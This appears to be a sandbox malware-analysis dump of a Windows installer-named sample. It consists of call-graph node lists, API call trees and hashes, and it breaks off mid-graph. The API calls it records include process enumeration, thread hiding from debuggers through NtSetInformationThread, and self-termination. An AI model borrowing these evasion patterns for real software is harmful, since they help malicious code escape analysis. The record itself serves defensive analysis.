61945->62523 61949 6ca14874 61947->61949 61955 6ca14887 61947->61955 62489 6ca15160 61947->62489 62497 6c8f2590 61947->62497 62507 6ca149b0 61949->62507 61952 6ca14902 std::ios_base::_Ios_base_dtor 61952->61806 61953 6ca1487c 61954 6c8b7090 77 API calls 61953->61954 61954->61955 62522 6c8de010 67 API calls 61955->62522 61956->61797 61959 6ca14087 std::locale::_Setgloballocale 61957->61959 61958 6ca14195 Process32NextW 61958->61959 61959->61958 61960 6ca141c7 61959->61960 61961 6ca140e4 CloseHandle 61959->61961 61962 6ca14160 Process32FirstW 61959->61962 61960->61727 61961->61959 61962->61959 61963->61744 61964->61763 61966->61726 61967->61859 61968->61866 61969->61868 61970->61861 61971->61864 61973 6c9eb763 _Yarn __wsopen_s std::locale::_Setgloballocale 61972->61973 61974 6c9ec2b0 61973->61974 61976 6c9eb900 CreateFileA 61973->61976 61977 6c9ea500 61973->61977 61974->61888 61976->61973 61979 6c9ea513 __wsopen_s std::locale::_Setgloballocale 61977->61979 61978 6c9eb0ef WriteFile 61978->61979 61979->61978 61980 6c9ea7f2 WriteFile 61979->61980 61981 6c9eb735 61979->61981 61982 6c9eab96 ReadFile 61979->61982 61980->61979 61981->61973 61982->61979 61984 6ca15863 std::_Facet_Register 4 API calls 61983->61984 61985 6c8e207e 61984->61985 61986 6ca16147 43 API calls 61985->61986 61987 6c8e2092 61986->61987 62023 6c8e2f60 42 API calls 4 library calls 61987->62023 61989 6c8e210d 61992 6c8e2120 61989->61992 62024 6ca15dae 9 API calls 2 library calls 61989->62024 61990 6c8e20c8 61990->61989 61991 6c8e2136 61990->61991 62025 6c8e2250 30 API calls 61991->62025 61992->61893 61995 6c8e215b 62026 6c8e2340 24 API calls 61995->62026 61997 6c8e2171 62027 6ca18199 RaiseException 61997->62027 61999 6c8e217c 61999->61893 62001 6ca16153 __EH_prolog3 62000->62001 62028 6ca15cd5 62001->62028 62006 6ca16171 62042 6ca161da 39 API calls std::locale::_Setgloballocale 62006->62042 62007 6ca161cc 62007->61897 62009 6ca16179 62043 6ca15fd1 HeapFree GetLastError _Yarn 62009->62043 62011 6ca1618f 62034 6ca15d06 62011->62034 62013 6c8e1ddc 62012->62013 62014 6c8b6d5d 62012->62014 62048 6ca16267 62013->62048 62014->61900 62019 6c8e2250 30 API calls 62014->62019 62018 6c8e1e82 62019->61902 62020->61904 62021->61906 62022->61908 62023->61990 62024->61992 62025->61995 62026->61997 62027->61999 62029 6ca15ce4 62028->62029 62030 6ca15ceb 62028->62030 62044 6ca1f1ed 6 API calls std::_Lockit::_Lockit 62029->62044 62032 6ca15ce9 62030->62032 62045 6ca173ab EnterCriticalSection 62030->62045 62032->62011 62041 6ca16050 6 API calls 2 library calls 62032->62041 62035 6ca15d10 62034->62035 62036 6ca1f1fb 62034->62036 62037 6ca15d23 62035->62037 62046 6ca173b9 LeaveCriticalSection 62035->62046 62047 6ca1f1d6 LeaveCriticalSection 62036->62047 62037->62007 62040 6ca1f202 62040->62007 62041->62006 62042->62009 62043->62011 62044->62032 62045->62032 62046->62037 62047->62040 62049 6ca16270 62048->62049 62051 6c8e1dea 62049->62051 62057 6ca1eb6a 62049->62057 62051->62014 62056 6ca1b383 18 API calls __wsopen_s 62051->62056 62052 6ca162bc 62052->62051 62068 6ca1e878 65 API calls 62052->62068 62054 6ca162d7 62054->62051 62069 6ca1f938 62054->62069 62056->62018 62059 6ca1eb75 __wsopen_s 62057->62059 62058 6ca1eb88 62094 6ca1ef40 18 API calls __wsopen_s 62058->62094 62059->62058 62060 6ca1eba8 62059->62060 62064 6ca1eb98 62060->62064 62080 6ca29c2c 62060->62080 62064->62052 62068->62054 62070 6ca1f944 __wsopen_s 62069->62070 62071 6ca1f963 62070->62071 62072 6ca1f94e 62070->62072 62073 6ca1f95e 62071->62073 62275 6ca1b3c9 EnterCriticalSection 62071->62275 62290 6ca1ef40 18 API calls __wsopen_s 62072->62290 62073->62051 62076 6ca1f980 62276 6ca1f9bc 62076->62276 62078 6ca1f98b 62291 6ca1f9b2 LeaveCriticalSection 62078->62291 62081 6ca29c38 __wsopen_s 62080->62081 62096 6ca1f1bf EnterCriticalSection 62081->62096 62083 6ca29c46 62097 6ca29cd0 62083->62097 62088 6ca29d92 62089 6ca29eb1 62088->62089 62121 6ca29f34 62089->62121 62093 6ca1ebec 62095 6ca1ec15 LeaveCriticalSection 62093->62095 62094->62064 62095->62064 62096->62083 62099 6ca29cf3 62097->62099 62098 6ca29d4b 62116 6ca26005 EnterCriticalSection LeaveCriticalSection HeapAlloc __Getctype std::_Facet_Register 62098->62116 62099->62098 62106 6ca29c53 62099->62106 62114 6ca1b3c9 EnterCriticalSection 62099->62114 62115 6ca1b3dd LeaveCriticalSection 62099->62115 62102 6ca29d54 62117 6ca235db HeapFree GetLastError _free 62102->62117 62104 6ca29d5d 62104->62106 62118 6ca25a3f 6 API calls std::_Lockit::_Lockit 62104->62118 62111 6ca29c8c 62106->62111 62107 6ca29d7c 62119 6ca1b3c9 EnterCriticalSection 62107->62119 62110 6ca29d8f 62110->62106 62120 6ca1f1d6 LeaveCriticalSection 62111->62120 62113 6ca1ebc3 62113->62064 62113->62088 62114->62099 62115->62099 62116->62102 62117->62104 62118->62107 62119->62110 62120->62113 62123 6ca29f53 62121->62123 62122 6ca29f7b 62130 6ca2a09b 62122->62130 62138 6ca32cc8 37 API calls __wsopen_s 62122->62138 62123->62122 62124 6ca29f66 62123->62124 62137 6ca1ef40 18 API calls __wsopen_s 62124->62137 62126 6ca29ec7 62126->62093 62134 6ca32dfe 62126->62134 62129 6ca2a0eb 62129->62130 62139 6ca32cc8 37 API calls __wsopen_s 62129->62139 62130->62126 62141 6ca1ef40 18 API calls __wsopen_s 62130->62141 62132 6ca2a109 62132->62130 62140 6ca32cc8 37 API calls __wsopen_s 62132->62140 62142 6ca331b6 62134->62142 62137->62126 62138->62129 62139->62132 62140->62130 62141->62126 62144 6ca331c2 __wsopen_s 62142->62144 62143 6ca331c9 62160 6ca1ef40 18 API calls __wsopen_s 62143->62160 62144->62143 62145 6ca331f4 62144->62145 62151 6ca32e1e 62145->62151 62148 6ca32e19 62148->62093 62162 6ca1f4eb 62151->62162 62156 6ca32e54 62158 6ca32e86 62156->62158 62202 6ca235db HeapFree GetLastError _free 62156->62202 62161 6ca3324b LeaveCriticalSection __wsopen_s 62158->62161 62160->62148 62161->62148 62203 6ca1ab0b 62162->62203 62166 6ca1f50f 62167 6ca1ac16 62166->62167 62212 6ca1ac6e 62167->62212 62169 6ca1ac2e 62169->62156 62170 6ca32e8c 62169->62170 62227 6ca3330c 62170->62227 62173 6ca32ebe __dosmaperr 62173->62156 62177 6ca32fb2 GetFileType 62179 6ca33004 62177->62179 62180 6ca32fbd GetLastError 62177->62180 62178 6ca32f87 GetLastError 62178->62173 62257 6ca305d0 SetStdHandle __dosmaperr __wsopen_s 62179->62257 62256 6ca1e812 __dosmaperr _free 62180->62256 62181 6ca32f35 62181->62177 62181->62178 62255 6ca33277 CreateFileW 62181->62255 62184 6ca32fcb CloseHandle 62184->62173 62198 6ca32ff4 62184->62198 62186 6ca32f7a 62186->62177 62186->62178 62187 6ca33025 62188 6ca33071 62187->62188 62258 6ca33486 70 API calls 2 library calls 62187->62258 62192 6ca33078 62188->62192 62272 6ca33530 70 API calls 2 library calls 62188->62272 62191 6ca330a6 62191->62192 62193 6ca330b4 62191->62193 62259 6ca2a745 62192->62259 62193->62173 62195 6ca33130 CloseHandle 62193->62195 62273 6ca33277 CreateFileW 62195->62273 62197 6ca3315b 62197->62198 62199 6ca33165 GetLastError 62197->62199 62198->62173 62200 6ca33171 __dosmaperr 62199->62200 62274 6ca3053f SetStdHandle __dosmaperr __wsopen_s 62200->62274 62202->62158 62204 6ca1ab2b 62203->62204 62210 6ca1ab22 62203->62210 62205 6ca237d2 __Getctype 37 API calls 62204->62205 62204->62210 62206 6ca1ab4b 62205->62206 62207 6ca23d48 __Getctype 37 API calls 62206->62207 62208 6ca1ab61 62207->62208 62209 6ca23d75 __fassign 37 API calls 62208->62209 62209->62210 62210->62166 62211 6ca257f5 5 API calls std::_Lockit::_Lockit 62210->62211 62211->62166 62213 6ca1ac96 62212->62213 62214 6ca1ac7c 62212->62214 62216 6ca1acbc 62213->62216 62218 6ca1ac9d 62213->62218 62215 6ca1abfc __wsopen_s HeapFree GetLastError 62214->62215 62222 6ca1ac86 __dosmaperr 62215->62222 62217 6ca23663 __fassign MultiByteToWideChar 62216->62217 62219 6ca1accb 62217->62219 62220 6ca1abbd __wsopen_s HeapFree GetLastError 62218->62220 62218->62222 62221 6ca1acd2 GetLastError 62219->62221 62223 6ca1acf8 62219->62223 62224 6ca1abbd __wsopen_s HeapFree GetLastError 62219->62224 62220->62222 62221->62222 62222->62169 62223->62222 62225 6ca23663 __fassign MultiByteToWideChar 62223->62225 62224->62223 62226 6ca1ad0f 62225->62226 62226->62221 62226->62222 62228 6ca33347 62227->62228 62230 6ca3332d 62227->62230 62229 6ca3329c __wsopen_s 18 API calls 62228->62229 62234 6ca3337f 62229->62234 62230->62228 62231 6ca1ef40 __wsopen_s 18 API calls 62230->62231 62231->62228 62232 6ca333ae 62233 6ca34731 __wsopen_s 18 API calls 62232->62233 62239 6ca32ea9 62232->62239 62235 6ca333fc 62233->62235 62234->62232 62237 6ca1ef40 __wsopen_s 18 API calls 62234->62237 62236 6ca33479 62235->62236 62235->62239 62238 6ca1ef6d __Getctype 11 API calls 62236->62238 62237->62232 62240 6ca33485 62238->62240 62239->62173 62241 6ca3042c 62239->62241 62242 6ca30438 __wsopen_s 62241->62242 62243 6ca1f1bf std::_Lockit::_Lockit EnterCriticalSection 62242->62243 62244 6ca3043f 62243->62244 62246 6ca30464 62244->62246 62250 6ca304d3 EnterCriticalSection 62244->62250 62252 6ca30486 62244->62252 62245 6ca30536 __wsopen_s LeaveCriticalSection 62247 6ca304a6 62245->62247 62248 6ca30662 __wsopen_s 11 API calls 62246->62248 62247->62173 62254 6ca33277 CreateFileW 62247->62254 62249 6ca30469 62248->62249 62251 6ca307b0 __wsopen_s EnterCriticalSection 62249->62251 62249->62252 62250->62252 62253 6ca304e0 LeaveCriticalSection 62250->62253 62251->62252 62252->62245 62253->62244 62254->62181 62255->62186 62256->62184 62257->62187 62258->62188 62260 6ca303c2 __wsopen_s 18 API calls 62259->62260 62263 6ca2a755 62260->62263 62261 6ca2a75b 62262 6ca3053f __wsopen_s SetStdHandle 62261->62262 62266 6ca2a7b3 __dosmaperr 62262->62266 62263->62261 62264 6ca303c2 __wsopen_s 18 API calls 62263->62264 62271 6ca2a78d 62263->62271 62267 6ca2a784 62264->62267 62265 6ca303c2 __wsopen_s 18 API calls 62268 6ca2a799 CloseHandle 62265->62268 62266->62173 62269 6ca303c2 __wsopen_s 18 API calls 62267->62269 62268->62261 62270 6ca2a7a5 GetLastError 62268->62270 62269->62271 62270->62261 62271->62261 62271->62265 62272->62191 62273->62197 62274->62198 62275->62076 62277 6ca1f9c9 62276->62277 62278 6ca1f9de 62276->62278 62314 6ca1ef40 18 API calls __wsopen_s 62277->62314 62281 6ca1f9d9 62278->62281 62292 6ca1fad9 62278->62292 62281->62078 62286 6ca1fa01 62307 6ca2a6b8 62286->62307 62288 6ca1fa07 62288->62281 62315 6ca235db HeapFree GetLastError _free 62288->62315 62290->62073 62291->62073 62293 6ca1faf1 62292->62293 62294 6ca1f9f3 62292->62294 62293->62294 62295 6ca28a80 18 API calls 62293->62295 62298 6ca2755e 62294->62298 62296 6ca1fb0f 62295->62296 62316 6ca2a98c 62296->62316 62299 6ca27575 62298->62299 62300 6ca1f9fb 62298->62300 62299->62300 62400 6ca235db HeapFree GetLastError _free 62299->62400 62302 6ca28a80 62300->62302 62303 6ca28aa1 62302->62303 62304 6ca28a8c 62302->62304 62303->62286 62401 6ca1ef40 18 API calls __wsopen_s 62304->62401 62306 6ca28a9c 62306->62286 62308 6ca2a6de 62307->62308 62311 6ca2a6c9 __dosmaperr 62307->62311 62309 6ca2a705 62308->62309 62312 6ca2a727 __dosmaperr 62308->62312 62402 6ca2a7e1 62309->62402 62311->62288 62410 6ca1ef40 18 API calls __wsopen_s 62312->62410 62314->62281 62315->62281 62317 6ca2a998 __wsopen_s 62316->62317 62318 6ca2a9ea 62317->62318 62319 6ca2a9a0 __dosmaperr 62317->62319 62320 6ca2aa53 __dosmaperr 62317->62320 62327 6ca307b0 EnterCriticalSection 62318->62327 62319->62294 62357 6ca1ef40 18 API calls __wsopen_s 62320->62357 62322 6ca2a9f0 62324 6ca2aa0c __dosmaperr 62322->62324 62328 6ca2aa7e 62322->62328 62356 6ca2aa4b LeaveCriticalSection __wsopen_s 62324->62356 62327->62322 62329 6ca2aaa0 62328->62329 62355 6ca2aabc __dosmaperr 62328->62355 62330 6ca2aaf4 62329->62330 62331 6ca2aaa4 __dosmaperr 62329->62331 62332 6ca2ab07 62330->62332 62366 6ca29a89 20 API calls __wsopen_s 62330->62366 62365 6ca1ef40 18 API calls __wsopen_s 62331->62365 62358 6ca2ac60 62332->62358 62337 6ca2ab5c 62341 6ca2ab70 62337->62341 62342 6ca2abb5 WriteFile 62337->62342 62338 6ca2ab1d 62339 6ca2ab21 62338->62339 62340 6ca2ab46 62338->62340 62339->62355 62367 6ca2b07b 6 API calls __wsopen_s 62339->62367 62368 6ca2acd1 43 API calls 5 library calls 62340->62368 62345 6ca2aba5 62341->62345 62346 6ca2ab7b 62341->62346 62344 6ca2abd9 GetLastError 62342->62344 62342->62355 62344->62355 62371 6ca2b0e3 7 API calls 2 library calls 62345->62371 62349 6ca2ab80 62346->62349 62350 6ca2ab95 62346->62350 62353 6ca2ab85 62349->62353 62349->62355 62370 6ca2b2a7 8 API calls 3 library calls 62350->62370 62352 6ca2ab93 62352->62355 62369 6ca2b1be 7 API calls 2 library calls 62353->62369 62355->62324 62356->62319 62357->62319 62359 6ca30805 __wsopen_s 18 API calls 62358->62359 62360 6ca2ac71 62359->62360 62364 6ca2ab18 62360->62364 62372 6ca237d2 GetLastError 62360->62372 62363 6ca2acae GetConsoleMode 62363->62364 62364->62337 62364->62338 62365->62355 62366->62332 62367->62355 62368->62355 62369->62352 62370->62352 62371->62352 62373 6ca237ef 62372->62373 62374 6ca237e9 62372->62374 62375 6ca25982 __Getctype 6 API calls 62373->62375 62378 6ca237f5 SetLastError 62373->62378 62376 6ca25943 __Getctype 6 API calls 62374->62376 62377 6ca2380d 62375->62377 62376->62373 62377->62378 62379 6ca23811 62377->62379 62385 6ca23883 62378->62385 62386 6ca23889 62378->62386 62380 6ca26005 __Getctype EnterCriticalSection LeaveCriticalSection HeapAlloc 62379->62380 62382 6ca2381d 62380->62382 62383 6ca23825 62382->62383 62384 6ca2383c 62382->62384 62388 6ca25982 __Getctype 6 API calls 62383->62388 62387 6ca25982 __Getctype 6 API calls 62384->62387 62385->62363 62385->62364 62389 6ca1f8e9 __Getctype 35 API calls 62386->62389 62391 6ca23848 62387->62391 62395 6ca23833 62388->62395 62390 6ca2388e 62389->62390 62392 6ca2384c 62391->62392 62396 6ca2385d 62391->62396 62393 6ca25982 __Getctype 6 API calls 62392->62393 62393->62395 62394 6ca235db _free HeapFree GetLastError 62397 6ca23839 62394->62397 62395->62394 62398 6ca235db _free HeapFree GetLastError 62396->62398 62397->62378 62399 6ca2386f 62398->62399 62399->62378 62400->62300 62401->62306 62403 6ca2a7ed __wsopen_s 62402->62403 62411 6ca307b0 EnterCriticalSection 62403->62411 62405 6ca2a7fb 62406 6ca2a828 62405->62406 62407 6ca2a745 __wsopen_s 21 API calls 62405->62407 62412 6ca2a861 LeaveCriticalSection __wsopen_s 62406->62412 62407->62406 62409 6ca2a84a 62409->62311 62410->62311 62411->62405 62412->62409 62413->61913 62414->61915 62415->61913 62416->61913 62417->61913 62421 6c8e022e 62418->62421 62419 6c8b70c4 62419->61926 62421->62419 62425 6ca205fb 62421->62425 62422->61927 62423->61929 62424->61931 62426 6ca20626 62425->62426 62427 6ca20609 62425->62427 62426->62421 62427->62426 62428 6ca20616 62427->62428 62429 6ca2062a 62427->62429 62441 6ca1ef40 18 API calls __wsopen_s 62428->62441 62433 6ca20822 62429->62433 62434 6ca2082e __wsopen_s 62433->62434 62442 6ca1b3c9 EnterCriticalSection 62434->62442 62436 6ca2083c 62443 6ca207df 62436->62443 62440 6ca2065c 62440->62421 62441->62426 62442->62436 62451 6ca273c6 62443->62451 62449 6ca20819 62450 6ca20871 LeaveCriticalSection 62449->62450 62450->62440 62452 6ca28a80 18 API calls 62451->62452 62453 6ca273d7 62452->62453 62454 6ca30805 __wsopen_s 18 API calls 62453->62454 62456 6ca273dd __wsopen_s 62454->62456 62455 6ca207f3 62458 6ca2065e 62455->62458 62456->62455 62468 6ca235db HeapFree GetLastError _free 62456->62468 62460 6ca20670 62458->62460 62462 6ca2068e 62458->62462 62459 6ca2067e 62469 6ca1ef40 18 API calls __wsopen_s 62459->62469 62460->62459 62460->62462 62465 6ca206a6 _Yarn 62460->62465 62467 6ca27479 62 API calls 62462->62467 62463 6ca1fad9 62 API calls 62463->62465 62464 6ca28a80 18 API calls 62464->62465 62465->62462 62465->62463 62465->62464 62466 6ca2a98c __wsopen_s 62 API calls 62465->62466 62466->62465 62467->62449 62468->62455 62469->62462 62471 6ca14e45 62470->62471 62472 6c8e2020 52 API calls 62471->62472 62473 6ca14ee6 62472->62473 62474 6ca15863 std::_Facet_Register 4 API calls 62473->62474 62475 6ca14f1e 62474->62475 62476 6ca16147 43 API calls 62475->62476 62477 6ca14f32 62476->62477 62478 6c8e1d90 89 API calls 62477->62478 62479 6ca14fdb 62478->62479 62480 6ca1500c 62479->62480 62524 6c8e2250 30 API calls 62479->62524 62480->61942 62482 6ca15046 62525 6c8e26e0 24 API calls 4 library calls 62482->62525 62484 6ca15058 62526 6ca18199 RaiseException 62484->62526 62486 6ca1506d 62527 6c8de010 67 API calls 62486->62527 62488 6ca1507f 62488->61942 62490 6ca151ad 62489->62490 62528 6ca153c0 62490->62528 62492 6ca1529c 62492->61947 62495 6ca151c5 62495->62492 62546 6c8e2250 30 API calls 62495->62546 62547 6c8e26e0 24 API calls 4 library calls 62495->62547 62548 6ca18199 RaiseException 62495->62548 62498 6c8f25cf 62497->62498 62501 6c8f25e3 62498->62501 62557 6c8e3560 32 API calls std::_Xinvalid_argument 62498->62557 62503 6c8f269e 62501->62503 62559 6c8e2250 30 API calls 62501->62559 62560 6c8e26e0 24 API calls 4 library calls 62501->62560 62561 6ca18199 RaiseException 62501->62561 62504 6c8f26b1 62503->62504 62558 6c8e37e0 32 API calls std::_Xinvalid_argument 62503->62558 62504->61947 62508 6ca149be 62507->62508 62512 6ca149f1 62507->62512 62509 6c8e01f0 64 API calls 62508->62509 62511 6ca149e4 62509->62511 62510 6ca14aa3 62510->61953 62513 6ca1f938 67 API calls 62511->62513 62512->62510 62562 6c8e2250 30 API calls 62512->62562 62513->62512 62515 6ca14ace 62563 6c8e2340 24 API calls 62515->62563 62517 6ca14ade 62564 6ca18199 RaiseException 62517->62564 62519 6ca14ae9 62565 6c8de010 67 API calls 62519->62565 62521 6ca14b42 std::ios_base::_Ios_base_dtor 62521->61953 62522->61945 62523->61952 62524->62482 62525->62484 62526->62486 62527->62488 62529 6ca15428 62528->62529 62530 6ca153fc 62528->62530 62535 6ca15439 62529->62535 62549 6c8e3560 32 API calls std::_Xinvalid_argument 62529->62549 62545 6ca15421 62530->62545 62551 6c8e2250 30 API calls 62530->62551 62533 6ca15608 62552 6c8e2340 24 API calls 62533->62552 62535->62545 62550 6c8e2f60 42 API calls 4 library calls 62535->62550 62536 6ca15617 62553 6ca18199 RaiseException 62536->62553 62540 6ca15647 62555 6c8e2340 24 API calls 62540->62555 62541 6ca15473 62541->62545 62554 6c8e2250 30 API calls 62541->62554 62543 6ca1565d 62556 6ca18199 RaiseException 62543->62556 62545->62495 62546->62495 62547->62495 62548->62495 62549->62535 62550->62541 62551->62533 62552->62536 62553->62541 62554->62540 62555->62543 62556->62545 62557->62501 62558->62504 62559->62501 62560->62501 62561->62501 62562->62515 62563->62517 62564->62519 62565->62521 62566 6c8af150 62568 6c8aefbe 62566->62568 62567 6c8af243 CreateFileA 62570 6c8af2a7 62567->62570 62568->62567 62569 6c8b02ca 62570->62569 62571 6c8b02ac GetCurrentProcess TerminateProcess 62570->62571 62571->62569 62572 6c893d62 62575 6c893bc0 62572->62575 62573 6c893e8a GetCurrentThread NtSetInformationThread 62574 6c893eea 62573->62574 62575->62573 62576 6ca1dd5f 62577 6ca1dd6b __wsopen_s 62576->62577 62578 6ca1dd72 GetLastError ExitThread 62577->62578 62579 6ca1dd7f 62577->62579 62580 6ca237d2 __Getctype 37 API calls 62579->62580 62581 6ca1dd84 62580->62581 62588 6ca28b86 62581->62588 62584 6ca1dd9b 62594 6ca1dcca 16 API calls 2 library calls 62584->62594 62587 6ca1ddbd 62589 6ca1dd8f 62588->62589 62590 6ca28b98 GetPEB 62588->62590 62589->62584 62593 6ca25b8f 5 API calls std::_Lockit::_Lockit 62589->62593 62590->62589 62591 6ca28bab 62590->62591 62595 6ca25c38 5 API calls std::_Lockit::_Lockit 62591->62595 62593->62584 62594->62587 62595->62589
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2040338619.000000006C891000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C890000, based on PE: true
                          • Associated: 00000006.00000002.2040310415.000000006C890000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041690153.000000006CA36000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2043157037.000000006CBFD000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID: _strlen
                          • String ID: HR^
                          • API String ID: 4218353326-1341859651
                          • Opcode ID: d530b424e2f33bc0aafa98faea8bc41b466304c71ac8571f5e842c14982bb654
                          • Instruction ID: 7ed6296131bfecc6fd9e1521d3c00ff670feb08488c36ac9f307683e560de9bc
                          • Opcode Fuzzy Hash: d530b424e2f33bc0aafa98faea8bc41b466304c71ac8571f5e842c14982bb654
                          • Instruction Fuzzy Hash: 6274E471644B028FC738CF2CC9D0695B7E2FF95318B198E6DC0AA8BA55E774B54ACB40

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 4635 6ca098b0-6ca098c2 4636 6ca098c4 4635->4636 4637 6ca098c6-6ca098f3 FindFirstFileA 4635->4637 4636->4637 4638 6ca0991c-6ca09925 4637->4638 4639 6ca09940-6ca09945 4638->4639 4640 6ca09927-6ca0992c 4638->4640 4643 6ca09947 4639->4643 4644 6ca09959-6ca0995e 4639->4644 4641 6ca09900-6ca0991a 4640->4641 4642 6ca0992e-6ca09933 4640->4642 4641->4638 4642->4638 4645 6ca09935-6ca09939 4642->4645 4646 6ca09949-6ca09957 FindClose 4643->4646 4644->4638 4647 6ca09960-6ca0996c 4644->4647 4645->4646 4646->4638
                          APIs
                          • FindFirstFileA.KERNEL32(?,?), ref: 6CA098CC
                          • FindClose.KERNEL32(000000FF), ref: 6CA09949
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2040338619.000000006C891000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C890000, based on PE: true
                          • Associated: 00000006.00000002.2040310415.000000006C890000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041690153.000000006CA36000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2043157037.000000006CBFD000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID: Find$CloseFileFirst
                          • String ID: gF:E$hF:E$hF:E
                          • API String ID: 2295610775-4234190611
                          • Opcode ID: 9b106b0b82de7340a89b557632fc41e246229da4c1fef69284b0b92242556492
                          • Instruction ID: ec018e1440dd9a9cc7e5f93cbb5d9f48399dce9a23077844032abdb9b5adc939
                          • Opcode Fuzzy Hash: 9b106b0b82de7340a89b557632fc41e246229da4c1fef69284b0b92242556492
                          • Instruction Fuzzy Hash: 4C116D746097419FC7148E78E544A4ABBF0BB86398F584E49F4A8C77A1E330CD88CB42

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 4774 6ca14050-6ca14085 CreateToolhelp32Snapshot 4775 6ca140c0-6ca140c9 4774->4775 4776 6ca14110-6ca14115 4775->4776 4777 6ca140cb-6ca140d0 4775->4777 4778 6ca14087-6ca140b1 call 6ca21a25 4776->4778 4779 6ca1411b-6ca14120 4776->4779 4780 6ca140d2-6ca140d7 4777->4780 4781 6ca14148-6ca1414d 4777->4781 4778->4775 4782 6ca14122-6ca14127 4779->4782 4783 6ca14195-6ca141a2 Process32NextW 4779->4783 4787 6ca140dd-6ca140e2 4780->4787 4788 6ca1417f-6ca14190 4780->4788 4784 6ca141bc-6ca141c1 4781->4784 4785 6ca1414f-6ca1417d call 6ca1a740 Process32FirstW 4781->4785 4782->4775 4789 6ca14129-6ca14143 4782->4789 4791 6ca141a7-6ca141b7 4783->4791 4784->4775 4793 6ca141c7-6ca141d5 4784->4793 4785->4791 4787->4775 4794 6ca140e4-6ca140ff CloseHandle 4787->4794 4788->4775 4789->4775 4791->4775 4794->4775
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 6CA1405E
                          • CloseHandle.KERNEL32(?), ref: 6CA140EC
                          Memory Dump Source
                          • Source File: 00000006.00000002.2040338619.000000006C891000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C890000, based on PE: true
                          • Associated: 00000006.00000002.2040310415.000000006C890000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041690153.000000006CA36000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2043157037.000000006CBFD000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID: CloseCreateHandleSnapshotToolhelp32
                          • String ID:
                          • API String ID: 3280610774-0
                          • Opcode ID: a356fdd0be9b5ee6a5c4f94dfac2a41e264caf189603b6a0641014fec355aebe
                          • Instruction ID: 94beea4e967032327c78c94568df38aa21231246ac424cdbbb600d5d4e2404bd
                          • Opcode Fuzzy Hash: a356fdd0be9b5ee6a5c4f94dfac2a41e264caf189603b6a0641014fec355aebe
                          • Instruction Fuzzy Hash: 21315EB064C3009FD710DF69C88574ABBE4EB8A368F144A19F598C3BA0D339D884DB43

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 4918 6c893886-6c89388e 4919 6c893970-6c89397d 4918->4919 4920 6c893894-6c893896 4918->4920 4922 6c89397f-6c893989 4919->4922 4923 6c8939f1-6c8939f8 4919->4923 4920->4919 4921 6c89389c-6c8938b9 4920->4921 4924 6c8938c0-6c8938c1 4921->4924 4922->4921 4925 6c89398f-6c893994 4922->4925 4926 6c8939fe-6c893a03 4923->4926 4927 6c893ab5-6c893aba 4923->4927 4928 6c89395e 4924->4928 4930 6c89399a-6c89399f 4925->4930 4931 6c893b16-6c893b18 4925->4931 4932 6c893a09-6c893a2f 4926->4932 4933 6c8938d2-6c8938d4 4926->4933 4927->4921 4929 6c893ac0-6c893ac7 4927->4929 4937 6c893960-6c893964 4928->4937 4929->4924 4938 6c893acd-6c893ad6 4929->4938 4939 6c89383b-6c893855 call 6c9e18a0 call 6c9e18b0 4930->4939 4940 6c8939a5-6c8939bf 4930->4940 4931->4924 4934 6c8938f8-6c893955 4932->4934 4935 6c893a35-6c893a3a 4932->4935 4936 6c893957-6c89395c 4933->4936 4934->4936 4941 6c893b1d-6c893b22 4935->4941 4942 6c893a40-6c893a57 4935->4942 4936->4928 4944 6c89396a 4937->4944 4945 6c893860-6c893885 4937->4945 4938->4931 4946 6c893ad8-6c893aeb 4938->4946 4939->4945 4947 6c893a5a-6c893a5d 4940->4947 4953 6c893b49-6c893b50 4941->4953 4954 6c893b24-6c893b44 4941->4954 4942->4947 4950 6c893ba1-6c893bb6 4944->4950 4945->4918 4946->4934 4951 6c893af1-6c893af8 4946->4951 4948 6c893aa9-6c893ab0 4947->4948 4948->4937 4955 6c893bc0-6c893bda call 6c9e18a0 call 6c9e18b0 4950->4955 4957 6c893afa-6c893aff 4951->4957 4958 